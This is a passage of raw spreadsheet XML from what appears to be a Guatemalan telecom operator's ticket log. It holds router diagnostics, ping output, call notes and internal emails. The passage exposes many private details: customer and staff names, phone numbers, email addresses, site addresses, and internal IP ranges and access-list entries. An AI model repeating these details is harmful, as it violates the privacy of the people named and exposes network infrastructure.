ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15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
CC_COOPERATIVA_OCCIDENTE_GT_SN_RAMON#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FASTETHERNET3                 0         0         0         0         0         0         0         0         0
* GIGABITETHERNET0              0         0         0         0     18000        10         0         0         0
* GIGABITETHERNET1              0         0         0         0      3000         5      4000         5         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
* VLAN1                         0         0         0         0      2000         1         0         0         0
CC_COOPERATIVA_OCCIDENTE_GT_SN_RAMON#SHO VER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COOPERATIVA_OCCIDENTE_GT_SN_RAMON UPTIME IS 3 WEEKS, 3 DAYS, 6 HOURS, 39 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH:C860VAE-ADVSECURITYK9-MZ.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REVISION 0.3) WITH 234496K/26624K BYTES OF MEMORY.
PROCESSOR BOARD ID GMK201001L0
1 DSL CONTROLLER
1 ETHERNET INTERFACE
4 FASTETHERNET INTERFACES
2 GIGABIT ETHERNET INTERFACES
1 ATM INTERFACE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
57344K BYTES SYSTEM FLASH ALLOCATED
CONFIGURATION REGISTER IS 0X2102
CC_COOPERATIVA_OCCIDENTE_GT_SN_RAMON#WR
BUILDING CONFIGURATION...
[OK]
CC_COOPERATIVA_OCCIDENTE_GT_SN_RAMON#EXIT
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;QTZLGTLFN2T1E03A02EIM3&gt;</t>
  </si>
  <si>
    <t>F4570033</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE EDUARDO ALFREDO MARTINEZ 22053399 Y 79100154
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE EDUARDO MARTINEZ, QUIEN INDICA QUE EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE.
SOLICITA QUE SE VALIDE EL DIA DE MAÑANA A LAS 8:00AM.
1001000942
COLA:
NOMBRE: A: 0050379100154
NÚMERO: 0050379100154
DURACIÓN: 0:00:19
ESTADO: MARCANDO
DETALLES: 0050379100154
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 19/05/2022 15:59:15</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDUARDO MARTINEZ 22053399 - 79100154 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001986585 - 3001987267</t>
  </si>
  <si>
    <t>F4570052</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. KEVIN  UBEDA  22024080 SOLICITA DEJAR EN MONITOREO, SE LLAMARA EN 30 MINS.</t>
  </si>
  <si>
    <t>F4570083</t>
  </si>
  <si>
    <t>YA SE TIENE EL RFO, SE PROCEDE A ENVIARLO, ADICIONAL SE LLAMÓ/HABLÓ CON JOEL FOCK CLIENTE 54825609; SE LE INDICA QUE SE LE ENVIÓ EL RFO Y CON LA ENTREGA DEL MISMO SE PROCEDE AL CIERRE, CLIENTE DE ACUERDO.</t>
  </si>
  <si>
    <t>TICKET PENDIENTE POR ELABORACIÓN DEL RFO, EN ESPERA DE LAS 48/72 HORAS HÁBILES, SE ESPERA TENERLO EN EL TRANSCURSO DE ESTA SEMANA.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOEL FOC 54825609 MENCIONA QUE LO QUE SE TIENE PENDIENTE ES UN INFORME, SE LE INDICA QUE SE PUEDE BRINDAR UN RFO CLIENTE ESTA DE ACUERDO -- KYJFOCK@CONTRALORIA.GOB.GT --
-ID 3001977894</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 19 DE MAYO DE 2022 14:20
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JOSE ANGEL GODINEZ OVALLE &lt;JANGEL.GODINEZ@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || INSTITUTO SALVADORENO DE CONTADORES PUBLICOS || F4569974
BUENA TARDE
     SOLICITO DE SU AMABLE APOYO CON LA ELABORACIÓN DE DICTAMEN TÉCNICO CON LOS SIGUIENTES DATOS:
EMPRESA 	ID 	TICKET
INSTITUTO SALVADORENO DE CONTADORES PUBLICOS
25230500SV
F4569974
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOEL FOC AL 54825609 - INDICA QUE POR EL MOMENTO TODO ESTA OK PERO NECESITA QUE SE DEJE PENDIENTE POR INFORMACION **
ID 3001937699
**</t>
  </si>
  <si>
    <t>F4570092</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN EL MONITOREO PROACTIVO, CAIDA TOTAL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70092
ID:  42700342T
IDENTIFICADOR DEL CLIENTE:  CC_BANTRAB_GT_AGENCIA_114
UBICADO EN:   AGENCIA BANTRAB CUIDAD PEDRO DE ALVARADO LOTE 2 ALDEA CIUDAD PEDRO DE ALVARADO MOYUTA JUTIAPA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO DE SEGUIMIENTO.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 22 DE MAYO DE 2022 12:48PARA: KENNY ROBERT RIVERA JUAREZ &lt;KENNY.RIVERA@CLARO.COM.GT&gt;; REDESYSEGURIDADTI@BANTRAB.NET.GT &lt;REDESYSEGURIDADTI@BANTRAB.NET.GT&gt;; MONITORTI@BANTRAB.NET.GT &lt;MONITORTI@BANTRAB.NET.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;ASUNTO: RE: ENLACE ALARMADO PARA EL CLIENTE BANCO DE LOS TRABAJADORES
ESTIMADO CLIENTE,
AUN OBSERVAMOS EL ENLACE CAÍDO CON ID "42700342T", SOLICITAMOS SU ACOSTUMBRADO APOYO CONTESTANDO ANTERIOR CORREO.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4570093</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE MILTON BARRERA 58263430 QUIEN SOLICITA SE LE LLAME EN 10 MINUTOS. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>CLIENTE MILTON BARRERA CONFIRMA EN SITIO SERVICIO OPERATIVO, NOS AUTORIZA EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A TEC DANIEL PEREZ PARA VALIDAR LOS AVANCES DE LA FALLA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>COMENTA QUE ESTA REVISANDO, PERO SE CORTA LA LLAMADA
SE INTENTA LLAMAR NUEVAMENTE ##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON TEC DANIEL 51345928
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4570094</t>
  </si>
  <si>
    <t>F4570098</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22558410 EXT 2110 MENCINA QUE EL SERVICIO ESTA PRESENTANDO INESTABILIDAD, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001965178</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ADELA VARGAS  / 81927785 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA OTRO CONTACTO 22558410 EXT 2110
-ID 3001963988</t>
  </si>
  <si>
    <t>**SE LLAMA NUEVAMENTE A CLIENTE ADELA VARGAS  / 81927785  NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001949197
**</t>
  </si>
  <si>
    <t>F4570102</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  ALEXIS RIVERA 72198813 / 77451536 PARA CONSULTAR QUE ESTA REPORTANDO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE ESTAN PRESENTANDO NUEVAMENTE PROBLEMAS CON INTERFERENCIA, CORTES DE LLAMADAS E INDICA QUE PROBLEMAS DE AUDIO YA QUE TIENEN CRUCE, COMENTA QUE ESTO ESTA DESDE EL LUNES APROXIMADAMENTE, SE LE INDICA QUE ESTAMOS TRABAJANDO EN LA FALLA Y CUALQUIER AVANCE SE LE ESTARA INFORMANDO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>NOS ATIENDE DANIEL, NOS MANTIENE EN LINEA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4570104</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. MARIO CRISPIN 57312961 ESTA TRATANDO DE REVISAR LOS EQUIPOS Y CONEXIONES .</t>
  </si>
  <si>
    <t>SR. MARIO CRISPIN 57312961 APLICO REINICIO AL ROUTER YA SE OBSERVA QUE ESTA CONECTADO A LA ONT PERO ENLACE AUN NO LEVANTA, VUELVE APLICAR REINICIO PERO AUN NO LEVANTA.</t>
  </si>
  <si>
    <t>TABLA DE ESCALAMIENTO PLANTA EXTERNA REGION METROSUR				
	WO OPEN                        		&lt;&lt;	12:55:00
1/4	ELMER FLORES	58260888	2 HORAS	14:55:00
2/4	ALDO DIAZ	58261057	3 HORAS	15:55:00
3/4	RENE AGUSTIN	58261183	5 HORAS	17:55:00
4/4	RODOLFO MORALES	58261609	6 HORAS	18:55:00</t>
  </si>
  <si>
    <t>F4570105</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001988917</t>
  </si>
  <si>
    <t>F4570132</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE DANNI CHUXUN, QUIEN VALIDA EQUIPO CTC CON ENERGIA, INDICA QUE NO PUEDEN ACCEDER A CORTAR LA CORRIENTE PORQUE SOLO SE LES AUTORIZA A LOS TECNICOS POR LO QUE COORIDINARA VISITA.
NÚMERO: 55613992
FIN: HOY, 12:41
ID DE LLAMADA: 3001833299</t>
  </si>
  <si>
    <t>F4570133</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON NOÉ PÉREZ/CLIENTE 22437253 SE LE PIDE APOYO SEGUIMIENTO, INDICA QUE YA LO VE OK, PIDE SE VERIFIQUE DEL LADO NUESTRO LO DICHO PARA ASÍ PROCEDER AL CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4570143</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  78322974 RESPONDE SAMANTA MENCIONA QUE EL SERVICIO ES MUY LENTO
-ID 3001846977
NOMBRE DEL CLIENTE: BANCO INMOBILIARIO, S.A.
UBICACIÓN:CALZADA SANTA LUCIA SUR  CASA NO. 55 ANTIGUA GUATEMALA
CONTACTO EN SITIO: SERGIO GARCIA - 78424117
HORARIO DE ATENCION: 9:00 - 17:00
GESTIÓN DE PERMISOS: DATO DE PERSONAL -- JOSE.CHACON@BANCOINMOBILIARIO.COM.GT</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78322974 MENCIONA QUE Y TODO ESTA FUNCIONANDO CORRECTAMENTE
CLIENTE MENCIONA QUE YA LE ESTAN DANDO SEGUIMIENTO CON SU EJECUTIVO
-ID 1001005688</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE CHACON 54329322 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001004917</t>
  </si>
  <si>
    <t>F4570146</t>
  </si>
  <si>
    <t>SE LLAMA AL 22317939  NO SE LOGRO COMUNICACION IVR ENVIA A BUZON, ID: 3001920207.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ERNESTO ELIAS 22317939, SOLICITA LLAMAR EN 20 MINS PARA REALIZAR PRUEAS CON LOS EQUIPOS YA QUE NO ESTA EL ENCARGADO SR. HENRY ID: 3001867562.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. HENRY 22317939 COMUNICA A MANTENIMIENTO CONTESTA ROLANDO QUINTANILLA INFORMA QUE TUVIERON PROBLEMA PERO CON LA TELEFONIA, NO ENCONTRO LOS EQUIPOS DE DATOS, SOLICITA LLAMAR DESPUES DE LAS 4PM, NO SE ENVIARA TECNICO YA QUE INFORMA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE,  ID: 3001923656.
ADICIONAL INFORMA LA DIRECCION CORRECTA: 11 CALLE ORIENTE, #271 CONTIGUO A ALCALDIA SAN SALVADOR</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. RAFAEL  TRABANINO 78032318 NO SE LOGRA COMUNICACION IVR ENVIA A BUZON ID 3001921687.</t>
  </si>
  <si>
    <t>F4570155</t>
  </si>
  <si>
    <t>CLIENTE LUIS GARCÍA INDICA QUE AYER HUBO UN APAGÓN Y AL RESTABLECER LA ENERGÍA EL E1 YA NO FUNCIONÓ, INDICA QUE UBICA UN EQUIPO CTC Y SU PLANTA PBX, SE LE SOLICITA APOYO PARA REINICIAR SU PLANTA PBX. CLIENTE COMENTA QUE HAY UN TECNICO REVISANDO LA PBX POR LO QUE NO LA PUEDE REINICIAR EN ESTE MOMENTO, SOLICITA SE LE LLAME EN 20 MINUTOS. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE LUIS FERNANDO GARCIA 42154028, CLIENTE COMENTA QUE EL E1 YA SE ENCUENTRA ACTIVO, INDICA QUE SOLVENTÓ EL INCONVENIENTE EN SU PLANTA PBX. VALIDA QUE EL E1 YA SE ENCUENTRA OPERATIVO. SOLICITA QUE SE CANCELE LA VISITA Y AUTORIZA EL CIERRE DEL CASO. 1001092747.</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL LUIS FERNANDO GARCIA 42154028 ID: 1001012375 INDICA QUE DESPUES DEL REINICIO EL SERVICIO SIGUE IGUAL, DEBIDO A QUE LE INDICARON QUE MEJOR SE ENVIARÍAN TECNICO ACEPTA QUE SE HAGA, POR LO QUE SE CONTACTA A ACCESOS EMPRESARIALES ATIENDE ANGEL GODINEZ Y SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/*</t>
  </si>
  <si>
    <t>F4570158</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290  RESPONDEN PERO DEJAN EN ESPERA Y NO RETOMAN LA LLAMADA
-ID 1001086476</t>
  </si>
  <si>
    <t>F4570159</t>
  </si>
  <si>
    <t>F4570162</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAYBEL CASTRO 25210428 MENCIONA QUE LES URGE EL SERVICIO Y CONFIRMA QUE ESTARAN ESPERANDO A PERSONAL TECNICO EN PR
-ID 3001981580</t>
  </si>
  <si>
    <t>F4570165</t>
  </si>
  <si>
    <t>CLIENTE ENVIARA FOTOGRAFIAS DE LOS EQUIPOS , INDICA QUE SE LLAME CUANDO LO ENVIE YA QUE SE CORTA COMUNICACION SI REALIZA ENVIO Y LLAMDA AL MISMO TIEMPO-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BELKIS CARCAMO 99449680 /88236455 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001101550 - 1001101736</t>
  </si>
  <si>
    <t>F4570170</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE RUBEN SOLICITA AVANCES, INDICA QUE GESTOR LE INDICO QUE LE LLAMABA EN 30MIN PORQUE IBA A REALIZAR UNAS VALIDACIONES PERO YA NO LE CONTACTÓ, SE VERIFICA F4570170 Y CRONOLOGIA NO INDICA INFORMACIÓN PRECISA POR LO QUE SE PROCEDE A CONTACTAR A GESTOR SAMUEL.ESTRADAG	ID: 1001007842 NO RESPONDE, SE MARCA A CNOC 8126 ID: 1001008009 ATIENDE LESTER RODAS Y SE LE SOLICITA APOYO, PIDE TIEMPO DE ESPERA E INDICA QUE CONSULTO CON GESTOR SAMUEL Y LE INDICA QUE YA HIZO PRUEBAS DE 1N Y QUE APARENTEMENTE EL INCONVENIENTE ES EN EL NODO POR LO QUE PROCEDERÁN A ABRIR WO, SE DEJA A CLIENTE EN CONFERENCIA GESTOR LESTER.RODAS/CLIENTE*/*/*/*/</t>
  </si>
  <si>
    <t>F4570188</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 30111854  NO RESPONDE, SE INTENTARA LUEGO **
ID 3001992322
**</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL ANDRES ORELLANA 31682345 ID: 1001001922 SE LE INFORMA DEL ID CORRECTO Y QUE NO TIENE ENERGIA COMERCIAL EN EL LUGAR, SE CONFIRMA EL CIERRE DEL TICKET*/*/*/*SE NOTIFICA A GESTOR Y SE CAMBIA DE ESTADO*/*/*/*</t>
  </si>
  <si>
    <t>F4570190</t>
  </si>
  <si>
    <t>**SE LLAMA A ISRAEL GONZALEZ AL 52988845 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001993190
**</t>
  </si>
  <si>
    <t>F4570197</t>
  </si>
  <si>
    <t>**SE  LLAMA AL SEÑOR  GUSTAVO DIAZ  AL 35722005 CONTESTA EL SEÑOR MIGUEL  INDICA QUE ES NUMERO EQUIVOCADO **
ID 3001996467
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERSON LEONEL TEJEDA ALEGRIA  AL 34702637 INDICA QUE NO ESTA EN OFICINA QUE SE LE LLAME AL SEÑOR  GUSTAVO DIAZ 35722005 **
ID 3001995893
**</t>
  </si>
  <si>
    <t>F4570199</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK MARCHENA 89045405 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001961613
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK MARCHENA 89045405 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001898659 - 3001900070
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK MARCHENA 89045405 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001000272
**</t>
  </si>
  <si>
    <t>F4570214</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ERICK MADRID AL 76828880 / 22109685 NO RESPONDE SE INTENTARA LUEGO **
ID 1001001840 - 1001002074
**</t>
  </si>
  <si>
    <t>F4570216</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO PÍNEDA 32719734 MENCIONA QUE YA APLICARON VARIOS REINICIOS AL EQUIPO PERO SIGUE SIN RESPONDER
CLIENTE MENCIONA QUE LOS EQUIPOS ACTUALMENTE NO LOS TIENE EL LA DIRECCION QUE APARECE EN SM
-ID 3001971942
NOMBRE DEL CLIENTE: INNOVA OUTSOURSING, S.A.
UBICACIÓN: RUTA 5 3-16 ZONA 4 (ATRAS DE GASOLINERA SHELL A UN COSTADO DE RADIADORES PORTO CARRERO)
CONTACTO EN SITIO:FERNANDO PINEDA  32719734
HORARIO DE ATENCION: HASTA LAS 17:00 HRS
GESTIÓN DE PERMISOS: CUANDO YA ESTEN EN PR LLAMAR A CLIENTE FERNANDO PINEDA  32719734  PARA  QUE BRINDE EL ACCESO</t>
  </si>
  <si>
    <t>--- SE PROCEDE A DAR SEGUIMIENTO. ..
...</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE YELSIN PÍNEDA AL 32719734 INDICA QUE EL SE RETIRA A LAS 19:00 HRS DEL LUGAR Y CONFIRMA DIRECCION  RUTA 5 3-16 ZONA 4 PUNTO REFERENCIA ATRAS DE GASOLINERA SHELL A UN COSTADO DE UN NEGOCIO RADIADORES PORTO CARRERO || SE NOTIFICA A GESTOR**
ID 1001832997
**</t>
  </si>
  <si>
    <t>F4570219</t>
  </si>
  <si>
    <t>*/*/*/SE CONTACTA AL PR CON FRANCISCO SIPRIAN 46266549 ID: 3001988089 QUIEN INDICA QUE PUEDE APOYAR CON PRUEBAS, POR LO QUE SE CONTACTA A GESTOR MARLON.RAMOS Y SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO SIPRIAN 46266549 RESPONDE PERO CORTA LA LLAMADA
-ID 3001993394</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO 78396313 PARA SOLICITAR DATOS DE VISITA
-ID 3001993963
NOMBRE DEL CLIENTE: AGENCIAS WAY S.A.
UBICACIÓN:1 CALLE 1-59 ZONA 4 CHIMALTENANGO
CONTACTO EN SITIO:  FRANCISCO - 78396313
HORARIO DE ATENCION: 8:30 - 18:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4570226</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 25069510 CONTESTA UN SEÑOR INDICA QUE ELLOS ESTARAN VERIFICANDO Y QUE NOS ESTARAN RESPONDIENDO **
ID 1001006768
**</t>
  </si>
  <si>
    <t>F4570256</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A SKARLETH MANZANERO/PR PARA SEGUIMIENTO, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELÉFONO APOYA SAMUEL ESTRADA/GESTOR N1; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN</t>
  </si>
  <si>
    <t>F4570265</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NELSON PORTILLO 33557224 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001970677</t>
  </si>
  <si>
    <t>F4570266</t>
  </si>
  <si>
    <t>TICKET PENDIENTE POR ELABORACIÓN DEL RFO, EN ESPERA DE LAS 48/72 HORAS HÁBILES.</t>
  </si>
  <si>
    <t>F4570279</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN COREAS 76170712 MENCIONA QUE EL INCONVENIENTE ES QUE ALGUNAS PC SI TENIAN SERVICIO Y OTRAS NO POR LO QUE SE LE INDICA QUE A NIVEL DE CLARO EL SERVICIO ESTA OPERATIVO Y ESTABLE
CLIENTE INDICA QUE ESCALARA CON SU IT
-ID 3001975762</t>
  </si>
  <si>
    <t>F4570284</t>
  </si>
  <si>
    <t>###SE VALIDA CON EL CLIENTE EL SERVICIO OPERATIVO Y ESTABLE , CONFIRMADO EN LA LLAMADA CON TECNICO Y CLIENTE EDMER GARCIA ##
SE PUEDE PROCEDER AL CIERRE DE TICKET
RESULTADO: CONTESTADA
NOMBRE: 58263440
NÚMERO: 58263440
INICIO: HOY, 12:50
FIN: HOY, 12:57
DURACIÓN: 6:56
ID DE LLAMADA: 1001190957
SE MANDA CORREO AL CLIENTE
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 13:02
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100040T::: TICKET CNOC IMBBL003951 ::: "FUERA DE SERVICIO "
MUY BUENAS TARDES ESTIMADOS.
CON REFERENCIA AL ENLACE SE LOGRA VERIFICAR QUE NO SERÁ NECESARIA LA VISITA, SE ENCONTRÓ PATCHCORD DAÑADO EN UNA CENTRAL DE CLARO. SE PROCEDIÓ A CORREGIR EL INCONVENIENTE Y SE VALIDÓ CON EL CONTACTO DEL PUNTO REMOTO EDMER GARCÍA EL ENLACE YA OPERATIVO.
ENLACE QUEDA OPERATIVO Y SIN PERDIDAS
&lt;QTZLGTLFN2T1E03A02EIM3&gt;PING -C 1000 -S 1500 -M 30 -B -VPN INTERNET_GT_DEPTAL 10.174.189.29
  PING 10.174.189.29: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.174.189.29 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/2/32 MS
SALUDOS</t>
  </si>
  <si>
    <t>SE CONTACTA AL PUNTO REMOTO BRINDADOS.
EDMER GARCIA ¿ EDEMER.GARCIA@GBSUPPORT.NET  - (502) 5019 7988
JUAN ALVARADO - JUAN.ALVARADO01@GBSUPPORT.NET (502) 5019 7552
SE CONTACTA CON EDMER GARCIA AL 50197988 ID 1001127071 SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE VE EL SERVICIO LO VEN YA OPERATIVO DESDE AYER 19/05/2022 DESDE LAS 15:00 POR LO QUE NO SERA NECESARIO REALIZAR PRUEBA ALGUNA, SE NOTIFICA AL GESTOR JOSE.OCHOA EL CIERRE VIA SKYPE.</t>
  </si>
  <si>
    <t>SE MANDA CORREO PARA QUE PUEDAN APOYARNOS GESTIONADO LOS PERMISOS.
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 11:01
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100040T::: TICKET CNOC IMBBL003951 ::: "FUERA DE SERVICIO "
MUY BUEN DÍA ESTIMADOS.
